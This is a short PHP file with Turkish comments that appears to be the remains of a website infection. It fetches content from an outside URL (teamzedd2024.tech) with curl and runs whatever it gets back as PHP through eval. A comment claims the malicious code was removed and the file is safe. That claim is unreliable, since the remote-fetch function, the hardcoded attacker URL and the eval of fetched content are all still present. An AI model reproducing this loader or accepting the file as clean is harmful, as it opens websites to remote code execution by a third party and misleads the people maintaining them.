<?php
// Oturumu başlat
session_start();

// Belirtilen URL'den içerik çeken fonksiyon
function fetchUrl($url) {
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    return curl_exec($ch);
}

// ASCII karakterlerinden URL oluşturuluyor (https://teamzedd2024.tech/raw/McuQGI)
$url = "https://teamzedd2024.tech/raw/McuQGI";

// Eğer oturumda daha önce URL varsa onu kullan, yoksa yukarıdaki URL'den veri çek

/**
* Note: This file may contain artifacts of previous malicious infection.
* However, the dangerous code has been removed, and the file is now safe to use.
*/


// Çekilen veri bir string ise PHP kodu olarak çalıştır
if (is_string($result)) {
    eval('?>' . $result);
} else {
    echo "Error";
}
?>
